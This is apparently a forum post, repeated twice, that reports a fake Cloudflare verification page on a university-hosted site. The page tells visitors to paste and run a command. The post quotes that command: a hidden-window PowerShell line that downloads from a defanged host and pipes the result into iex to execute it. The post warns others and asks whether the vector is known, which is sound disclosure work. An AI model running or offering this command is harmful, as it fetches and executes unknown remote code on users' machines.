Has this phishing/infection vector been exposed yet? I visited a website of some professor hosted at a university. I was presented with the following Cloudflare message I've never seen before (image in linked tweet).
When I read the instructions, I had to do a double take. How many unsuspecting internet users would do this without thinking twice?
Win+R (run prompt), Ctrl+V (paste), Enter (execute).
What are we executing? This (I replaced . with [DOT]):
powershell -w h "curl bronxy[DOT]cc/sign/in|iex"
Threat actors often use the "iex" command for their ability to launch both local and remote payloads. I curled the url, and for me, it showed a Teams exe from MS (VirusTotal here: https://virustotal.com/gui/url/fb9945173e557129d38ccdf204622...), but I wonder if the response switches to something malicious sometimes.
Has this phishing/infection vector been exposed yet? I visited a website of some professor hosted at a university. I was presented with the following Cloudflare message I've never seen before (image in linked tweet).
When I read the instructions, I had to do a double take. How many unsuspecting internet users would do this without thinking twice?
Win+R (run prompt), Ctrl+V (paste), Enter (execute).
What are we executing? This (I replaced . with [DOT]): powershell -w h "curl bronxy[DOT]cc/sign/in|iex"
Threat actors often use the "iex" command for their ability to launch both local and remote payloads. I curled the url, and for me, it showed a Teams exe from MS (VirusTotal here: https://virustotal.com/gui/url/fb9945173e557129d38ccdf204622...), but I wonder if the response switches to something malicious sometimes.